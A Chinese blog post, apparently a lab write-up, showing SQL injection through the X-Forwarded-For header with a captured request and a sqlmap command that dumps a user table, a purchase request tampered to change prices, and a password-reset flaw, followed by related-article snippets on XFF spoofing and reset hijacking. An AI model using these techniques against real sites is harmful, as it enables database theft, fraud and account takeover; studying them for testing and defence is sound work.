x-forward-for和逻辑漏洞

最新推荐文章于 2023-02-19 21:38:58 发布
最新推荐文章于 2023-02-19 21:38:58 发布
阅读量845 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/113815225
版权

x-forward-for和逻辑漏洞

X-Forwarded-For

(XFF)是用来识别ip地址
使用sqlmap跑
包的内容
POST /index.php HTTP/1.1
Host: 219.153.49.228:42344
X-Forwarded-For:127.0.0.1*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://219.153.49.228:42344
Connection: close
Referer: http://219.153.49.228:42344/index.php
Upgrade-Insecure-Requests: 1

username=admin&password=admin

结果:
在这里插入图片描述

动用sqlmap跑出来了
在这里插入图片描述

跑出数据库
sqlmap -r fot.txt --batch -D webcalendar -T user --dump
在这里插入图片描述

结果:
在这里插入图片描述

逻辑漏洞

直接把单价改了就行,改成0

POST /buy.php HTTP/1.1
Host: 219.153.49.228:48560
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://219.153.49.228:48560
Connection: close
Referer: http://219.153.49.228:48560/verify.php
Upgrade-Insecure-Requests: 1

bill1=10&bill2=20&num1=1&num2=1&uid=1

结果
在这里插入图片描述

三 密码重置的逻辑漏洞
太鸡肋了,只验证号,不验证手机
在这里插入图片描述

漏洞原理
先利用已经注册的手机号188,获得验证码,然后在重置的时候改成171的
结果

wx_7782175678
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku 细心(爬虫协议,x-forward-for)
wssmiss的博客
07-18 404
题目 分析 查看源代码没有有效信息 御剑扫一下后台发现robots.txt 打开robots.txt 是一个爬虫协议 声明所有搜索引擎禁止收录本站的resusl.php 手动打开此页面 提示ip被封,那我们就用本地ip访问试试 加入X-Forward-For:127.0.0.1 根据最后一行提示,猜测x的值可能为admin payload: /resusl.php?x=admin -For...
X-Forwarded-For的一些理解
weixin_34239169的博客
02-06 807
X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址(其实这个真实未必是真实的,后面会说到)。 那为什么 Web 服务器只有通过 X-Forwarded-For 头才能获取真实的 IP?这里用 PHP 语言来说明,不明白原理的开发者为了获取客户 IP,会使用 $_SERVER['REMOTE_ADDR'] 变量,这个服务器变量表示和...
x-forward-for详解
真理部
10-09 1万+
http://www.cnblogs.com/xdjackfeng/p/3514120.htmlx-forward-for
X-Forwarded-For注入漏洞实战
qq_36933272的博客
09-03 1877
浏览器设置代理,burp截断登陆请求的数据包 send to repeater,然后增加一行X-Forwarded-For:*,下一行留空 Go 保存response,改成txt文件 打开sqlmap,依次查出数据库、查询表名、查询列中的字段,如sqlmap -r txt文件路径 --dbs --batch(–batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。) sql...
X-Forward-For和Referer的相关知识点
qq_43511094的博客
03-21 1857
X-Forward-For和RefererX-Forward-ForReferer 前言 X-Forward-For和Referer通常出现在请求头环节,因为有些服务器会有求必须是特定的Referer或者特定的X-Forward-For,所以我们抓包之后要自己加入这两个参数,并修改他们的值 X-Forward-For X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端最真实的IP。只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
x-forward-for:X-Forwarded-For标头浏览器扩展
01-30
x转发 X-Forwarded-For标头浏览器扩展 得到它 或
Chrome插件:X-Forwarded-For Header
12-15
X-Forwarded-For Header插件,此扩展允许您快速设置X-Forwarded-For HTTP标头
Golang中间件,用于处理X-Forwarded-For标头-Golang开发
05-26
Go软件包的X-Forwarded-For中间件xff是net / http中间件/处理程序,用于解析Golang中的Forwarded HTTP Extension。 用法示例安装xff:转到get github.com/sebest/xff编辑server.go:打包主X-Forwarded-For中间件转到...
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标头 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
4-Web安全——通过x-forward-for获取真实ip(入侵溯源)
网络安全
03-28 5960
参考资料:44-http协议 x-forward-for是http请求的一个字段,该字段表示客户端的IP地址,一般称为“XXF”头,服务端通过这个头可以知道客户端的真实或代理IP。x-forward-for字段虽然没有写入RFC标准,但已经应用到http协议中成为一个实施标准了。 x-forward-for字段的格式为: x-forward-for:client1,proxy1,proxy2,proxy3 该字段的ip地址值以逗分隔,其中client1代表真实的客户端的ip地址,...
http细节
evsqiezi
07-25 420
X-Forwarded-For 通过名字就知道,X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Ex
在密码重置请求包中添加X-Forwarded-Host实现受害者账户完全劫持
cj_Hydra's Blog
08-25 575
今天分享的这篇Writeup为作者通过利用目标网站“忘记密码”功能,在重置密码请求发包中添加X-Forwarded-Host主机信息,欺骗目标网站把重置密码的链接导向到自己的服务器,从而实现对受害者账户的完全劫持 这里,基于保密原因,先假设目标测试网站为redacted.com,在对其测试过程中,我把重点放到了它的“忘记密码”功能处。经过了6个小时的折腾,我发现了其中存在一个非常有意思的漏洞,利用该漏洞可以实现对目标受害者的完全账户劫持。 发现过程: 所需工具:BurpSuite、Ngrok Server.
墨者X-Forwarded-For注入漏洞实战
wswr的博客
03-10 706
思路:反正首先按照正常测sql注入点,我们都要对各个地方试试,什么看源码找可能存在的注入点,或者遇事不觉弱口令啥的,但是既然题目是XFF注入,那基本就是提交会对ip检测,因而存在注入点 总结:注入点的掌握,sqlmap抓包的使用和技巧(*),细心 ps:为什么不手巧代码,方便大伙复制命令,绝对不是因为懒,是因为自己敲一遍更有感觉,嗯嗯,没错!(我他喵敲了好多遍) admin/admin登入发现确实存在对ip的检测 然后就是burpsuite抓包改X-Forward-For字段 发.
Discuz!X 系列 HTTP_X_FORWARDED_FOR 绕过限制进行密码爆破
aixuan9365的博客
05-29 470
分析有个不对头的地方:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080211.html 后面再补 这个漏洞比较简单。 我们看到配置文件来。/include/common.inc.php 第86-94行。 if(getenv('HTTP_CLIENT_IP') && strcasecmp(geten...
正向代理,反向代理,nginx负载均衡,X-forward-for
qq_35370923的博客
11-02 767
正向代理:访问一个网站,之前访问另一服务器,这个服务器代替我们访问,然后把结果返回给我们。 反向代理:服务器端在接收请求之前,一般通过nginx负载均衡向多个服务器转发请求。 nginx负载均衡: nginx作为一个比较高效的http请求处理软件,可以用它接受某个服务器地址的所有请求,再根据配置的权重将这些请求转发到其他服务器,防止一个服务器处理高并发的请求出现宕机问题。 X-forward-fo...
关于 X-Forward-
e5pool的博客
02-19 1583
刚刚有个需求,如何获取访问者的真实IP,找到一个方法,可以通过请求头里的 X-Forwarded-For 字段来获取到。然后就了解下 X-Forward- 的细节。
利用X-Forwarded-For伪造客户端IP漏洞成因及防范
热门推荐
叉叉哥的BLOG
10-15 6万+
问题背景 在Web应用开发中,经常会需要获取客户端IP地址。一个典型的例子就是投票系统,为了防止刷票,需要限制每个IP地址只能投票一次。 如何获取客户端IP 在Java中,获取客户端IP最直接的方式就是使用request.getRemoteAddr()。这种方式能获取到连接服务器的客户端IP,在中间没有代理的情况下,的确是最简单有效的方式。但是目前互联网Web应用很少会将应用服务器直接对外提...
x-forward-for
最新发布
06-08
x-forward-for是一个HTTP头,它通常被用于...在一些情况下,客户端的IP地址可能会被代理服务器改变,而x-forward-for头可以帮助我们获取到客户端的真实IP地址。这个头通常被用于Web服务器的安全审计、访问控制等方面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值